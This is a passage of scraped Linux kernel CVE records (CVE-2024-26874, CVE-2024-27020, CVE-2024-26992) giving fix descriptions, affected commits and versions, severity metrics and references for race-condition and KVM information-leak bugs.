            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9acee29a38b4d4b70f1f583e5ef9a245db4db710"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3fc88b246a2fc16014e374040fc15af1d3752535"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c958e86e9cc1b48cac004a6e245154dfba8e163b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/mediatek/mtk_drm_crtc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "accdac6b71d5a2b84040c3d2234f53a60edc398e",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "dfde84cc6c589f2a9f820f12426d97365670b731",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "4688be96d20ffa49d2186523ee84f475f316fd49",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "9beec711a17245b853d64488fd5b739031612340",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "d2bd30c710475b2e29288827d2c91f9e6e2b91d7",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "a3dd12b64ae8373a41a216a0b621df224210860a",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "9acee29a38b4d4b70f1f583e5ef9a245db4db710",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "3fc88b246a2fc16014e374040fc15af1d3752535",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "c958e86e9cc1b48cac004a6e245154dfba8e163b",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/mediatek/mtk_drm_crtc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.7"
            },
            {
              "lessThan": "4.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.311",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.273",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.311",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.273",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mediatek: Fix a null pointer crash in mtk_drm_crtc_finish_page_flip\n\nIt\u0027s possible that mtk_crtc-\u003eevent is NULL in\nmtk_drm_crtc_finish_page_flip().\n\npending_needs_vblank value is set by mtk_crtc-\u003eevent, but in\nmtk_drm_crtc_atomic_flush(), it\u0027s is not guarded by the same\nlock in mtk_drm_finish_page_flip(), thus a race condition happens.\n\nConsider the following case:\n\nCPU1                              CPU2\nstep 1:\nmtk_drm_crtc_atomic_begin()\nmtk_crtc-\u003eevent is not null,\n                                  step 1:\n                                  mtk_drm_crtc_atomic_flush:\n                                  mtk_drm_crtc_update_config(\n                                      !!mtk_crtc-\u003eevent)\nstep 2:\nmtk_crtc_ddp_irq -\u003e\nmtk_drm_finish_page_flip:\nlock\nmtk_crtc-\u003eevent set to null,\npending_needs_vblank set to false\nunlock\n                                  pending_needs_vblank set to true,\n\n                                  step 2:\n                                  mtk_crtc_ddp_irq -\u003e\n                                  mtk_drm_finish_page_flip called again,\n                                  pending_needs_vblank is still true\n                                  //null pointer\n\nInstead of guarding the entire mtk_drm_crtc_atomic_flush(), it\u0027s more\nefficient to just check if mtk_crtc-\u003eevent is null before use."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:58:35.767Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/accdac6b71d5a2b84040c3d2234f53a60edc398e"
        },
        {
          "url": "https://git.kernel.org/stable/c/dfde84cc6c589f2a9f820f12426d97365670b731"
        },
        {
          "url": "https://git.kernel.org/stable/c/4688be96d20ffa49d2186523ee84f475f316fd49"
        },
        {
          "url": "https://git.kernel.org/stable/c/9beec711a17245b853d64488fd5b739031612340"
        },
        {
          "url": "https://git.kernel.org/stable/c/d2bd30c710475b2e29288827d2c91f9e6e2b91d7"
        },
        {
          "url": "https://git.kernel.org/stable/c/a3dd12b64ae8373a41a216a0b621df224210860a"
        },
        {
          "url": "https://git.kernel.org/stable/c/9acee29a38b4d4b70f1f583e5ef9a245db4db710"
        },
        {
          "url": "https://git.kernel.org/stable/c/3fc88b246a2fc16014e374040fc15af1d3752535"
        },
        {
          "url": "https://git.kernel.org/stable/c/c958e86e9cc1b48cac004a6e245154dfba8e163b"
        }
      ],
      "title": "drm/mediatek: Fix a null pointer crash in mtk_drm_crtc_finish_page_flip",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26874",
    "datePublished": "2024-04-17T10:27:33.278Z",
    "dateReserved": "2024-02-19T14:20:24.185Z",
    "dateUpdated": "2025-05-04T08:58:35.767Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27020 (GCVE-0-2024-27020)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:30 – Updated: 2025-11-04 17:17

Title

netfilter: nf_tables: Fix potential data-race in __nft_expr_type_get()

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: Fix potential data-race in __nft_expr_type_get() nft_unregister_expr() can concurrent with __nft_expr_type_get(), and there is not any protection when iterate over nf_tables_expressions list in __nft_expr_type_get(). Therefore, there is potential data-race of nf_tables_expressions list entry. Use list_for_each_entry_rcu() to iterate over nf_tables_expressions list in __nft_expr_type_get(), and use rcu_read_lock() in the caller nft_expr_type_get() to protect the entire type query process.

Severity ?

7 (High)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/939109c0a8e2a006a…
	https://git.kernel.org/stable/c/b38a133d37fa421c8…
	https://git.kernel.org/stable/c/934e66e231cff2b18…
	https://git.kernel.org/stable/c/0b6de00206adbbfc6…
	https://git.kernel.org/stable/c/8d56bad42ac4c43c6…
	https://git.kernel.org/stable/c/a9ebf340d123ae125…
	https://git.kernel.org/stable/c/01f1a678b05ade4b1…
	https://git.kernel.org/stable/c/f969eb84ce482331a…

Impacted products

Vendor

Product

Version

Linux

Affected: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e , < 939109c0a8e2a006a6cc8209e262d25065f4403a (git)
Affected: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e , < b38a133d37fa421c8447b383d788c9cc6f5cb34c (git)
Affected: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e , < 934e66e231cff2b18faa2c8aad0b8cec13957e05 (git)
Affected: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e , < 0b6de00206adbbfc6373b3ae38d2a6f197987907 (git)
Affected: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e , < 8d56bad42ac4c43c6c72ddd6a654a2628bf839c5 (git)
Affected: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e , < a9ebf340d123ae12582210407f879d6a5a1bc25b (git)
Affected: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e , < 01f1a678b05ade4b1248019c2dcca773aebbeb7f (git)
Affected: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e , < f969eb84ce482331a991079ab7a5c4dc3b7f89bf (git)

Linux

Affected: 3.13
Unaffected: 0 , < 3.13 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.157 , ≤ 5.15.* (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 7,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-27020",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-30T19:26:58.391230Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-362",
                "description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-30T19:27:09.041Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:17:36.550Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/939109c0a8e2a006a6cc8209e262d25065f4403a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b38a133d37fa421c8447b383d788c9cc6f5cb34c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/934e66e231cff2b18faa2c8aad0b8cec13957e05"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0b6de00206adbbfc6373b3ae38d2a6f197987907"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8d56bad42ac4c43c6c72ddd6a654a2628bf839c5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a9ebf340d123ae12582210407f879d6a5a1bc25b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/01f1a678b05ade4b1248019c2dcca773aebbeb7f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f969eb84ce482331a991079ab7a5c4dc3b7f89bf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "939109c0a8e2a006a6cc8209e262d25065f4403a",
              "status": "affected",
              "version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
              "versionType": "git"
            },
            {
              "lessThan": "b38a133d37fa421c8447b383d788c9cc6f5cb34c",
              "status": "affected",
              "version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
              "versionType": "git"
            },
            {
              "lessThan": "934e66e231cff2b18faa2c8aad0b8cec13957e05",
              "status": "affected",
              "version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
              "versionType": "git"
            },
            {
              "lessThan": "0b6de00206adbbfc6373b3ae38d2a6f197987907",
              "status": "affected",
              "version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
              "versionType": "git"
            },
            {
              "lessThan": "8d56bad42ac4c43c6c72ddd6a654a2628bf839c5",
              "status": "affected",
              "version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
              "versionType": "git"
            },
            {
              "lessThan": "a9ebf340d123ae12582210407f879d6a5a1bc25b",
              "status": "affected",
              "version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
              "versionType": "git"
            },
            {
              "lessThan": "01f1a678b05ade4b1248019c2dcca773aebbeb7f",
              "status": "affected",
              "version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
              "versionType": "git"
            },
            {
              "lessThan": "f969eb84ce482331a991079ab7a5c4dc3b7f89bf",
              "status": "affected",
              "version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.13"
            },
            {
              "lessThan": "3.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.157",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.157",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: Fix potential data-race in __nft_expr_type_get()\n\nnft_unregister_expr() can concurrent with __nft_expr_type_get(),\nand there is not any protection when iterate over nf_tables_expressions\nlist in __nft_expr_type_get(). Therefore, there is potential data-race\nof nf_tables_expressions list entry.\n\nUse list_for_each_entry_rcu() to iterate over nf_tables_expressions\nlist in __nft_expr_type_get(), and use rcu_read_lock() in the caller\nnft_expr_type_get() to protect the entire type query process."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:02:25.729Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/939109c0a8e2a006a6cc8209e262d25065f4403a"
        },
        {
          "url": "https://git.kernel.org/stable/c/b38a133d37fa421c8447b383d788c9cc6f5cb34c"
        },
        {
          "url": "https://git.kernel.org/stable/c/934e66e231cff2b18faa2c8aad0b8cec13957e05"
        },
        {
          "url": "https://git.kernel.org/stable/c/0b6de00206adbbfc6373b3ae38d2a6f197987907"
        },
        {
          "url": "https://git.kernel.org/stable/c/8d56bad42ac4c43c6c72ddd6a654a2628bf839c5"
        },
        {
          "url": "https://git.kernel.org/stable/c/a9ebf340d123ae12582210407f879d6a5a1bc25b"
        },
        {
          "url": "https://git.kernel.org/stable/c/01f1a678b05ade4b1248019c2dcca773aebbeb7f"
        },
        {
          "url": "https://git.kernel.org/stable/c/f969eb84ce482331a991079ab7a5c4dc3b7f89bf"
        }
      ],
      "title": "netfilter: nf_tables: Fix potential data-race in __nft_expr_type_get()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27020",
    "datePublished": "2024-05-01T05:30:15.908Z",
    "dateReserved": "2024-02-19T14:20:24.209Z",
    "dateUpdated": "2025-11-04T17:17:36.550Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26992 (GCVE-0-2024-26992)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:27 – Updated: 2025-11-04 17:15

Title

KVM: x86/pmu: Disable support for adaptive PEBS

Summary

In the Linux kernel, the following vulnerability has been resolved: KVM: x86/pmu: Disable support for adaptive PEBS Drop support for virtualizing adaptive PEBS, as KVM's implementation is architecturally broken without an obvious/easy path forward, and because exposing adaptive PEBS can leak host LBRs to the guest, i.e. can leak host kernel addresses to the guest. Bug #1 is that KVM doesn't account for the upper 32 bits of IA32_FIXED_CTR_CTRL when (re)programming fixed counters, e.g fixed_ctrl_field() drops the upper bits, reprogram_fixed_counters() stores local variables as u8s and truncates the upper bits too, etc. Bug #2 is that, because KVM _always_ sets precise_ip to a non-zero value for PEBS events, perf will _always_ generate an adaptive record, even if the guest requested a basic record. Note, KVM will also enable adaptive PEBS in individual *counter*, even if adaptive PEBS isn't exposed to the guest, but this is benign as MSR_PEBS_DATA_CFG is guaranteed to be zero, i.e. the guest will only ever see Basic records. Bug #3 is in perf. intel_pmu_disable_fixed() doesn't clear the upper bits either, i.e. leaves ICL_FIXED_0_ADAPTIVE set, and intel_pmu_enable_fixed() effectively doesn't clear ICL_FIXED_0_ADAPTIVE either. I.e. perf _always_ enables ADAPTIVE counters, regardless of what KVM requests. Bug #4 is that adaptive PEBS *might* effectively bypass event filters set by the host, as "Updated Memory Access Info Group" records information that might be disallowed by userspace via KVM_SET_PMU_EVENT_FILTER. Bug #5 is that KVM doesn't ensure LBR MSRs hold guest values (or at least zeros) when entering a vCPU with adaptive PEBS, which allows the guest to read host LBRs, i.e. host RIPs/addresses, by enabling "LBR Entries" records. Disable adaptive PEBS support as an immediate fix due to the severity of the LBR leak in particular, and because fixing all of the bugs will be non-trivial, e.g. not suitable for backporting to stable kernels. Note! This will break live migration, but trying to make KVM play nice with live migration would be quite complicated, wouldn't be guaranteed to work (i.e. KVM might still kill/confuse the guest), and it's not clear that there are any publicly available VMMs that support adaptive PEBS, let alone live migrate VMs that support adaptive PEBS, e.g. QEMU doesn't support PEBS in any capacity.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0fb74c00d140a6612…
	https://git.kernel.org/stable/c/037e48ceccf163899…
	https://git.kernel.org/stable/c/7a7650b3ac23e5fc8…
	https://git.kernel.org/stable/c/9e985cbf2942a1bb8…

Impacted products

Vendor

Product

Version

Linux

Affected: c59a1f106f5cd4843c097069ff1bb2ad72103a67 , < 0fb74c00d140a66128afc0003785dcc57e69d312 (git)
Affected: c59a1f106f5cd4843c097069ff1bb2ad72103a67 , < 037e48ceccf163899374b601afb6ae8d0bf1d2ac (git)
Affected: c59a1f106f5cd4843c097069ff1bb2ad72103a67 , < 7a7650b3ac23e5fc8c990f00e94f787dc84e3175 (git)
Affected: c59a1f106f5cd4843c097069ff1bb2ad72103a67 , < 9e985cbf2942a1bb8fcef9adc2a17d90fd7ca8ee (git)

Linux

Affected: 6.0
Unaffected: 0 , < 6.0 (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:15:44.124Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0fb74c00d140a66128afc0003785dcc57e69d312"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/037e48ceccf163899374b601afb6ae8d0bf1d2ac"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7a7650b3ac23e5fc8c990f00e94f787dc84e3175"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9e985cbf2942a1bb8fcef9adc2a17d90fd7ca8ee"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26992",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:44:53.201167Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:39.904Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/kvm/vmx/vmx.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0fb74c00d140a66128afc0003785dcc57e69d312",
              "status": "affected",
              "version": "c59a1f106f5cd4843c097069ff1bb2ad72103a67",
              "versionType": "git"
            },
            {
              "lessThan": "037e48ceccf163899374b601afb6ae8d0bf1d2ac",
              "status": "affected",
              "version": "c59a1f106f5cd4843c097069ff1bb2ad72103a67",
              "versionType": "git"
            },
            {
              "lessThan": "7a7650b3ac23e5fc8c990f00e94f787dc84e3175",
              "status": "affected",
              "version": "c59a1f106f5cd4843c097069ff1bb2ad72103a67",
              "versionType": "git"
            },
            {
              "lessThan": "9e985cbf2942a1bb8fcef9adc2a17d90fd7ca8ee",
              "status": "affected",
              "version": "c59a1f106f5cd4843c097069ff1bb2ad72103a67",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/kvm/vmx/vmx.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.0"
            },
            {
              "lessThan": "6.0",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
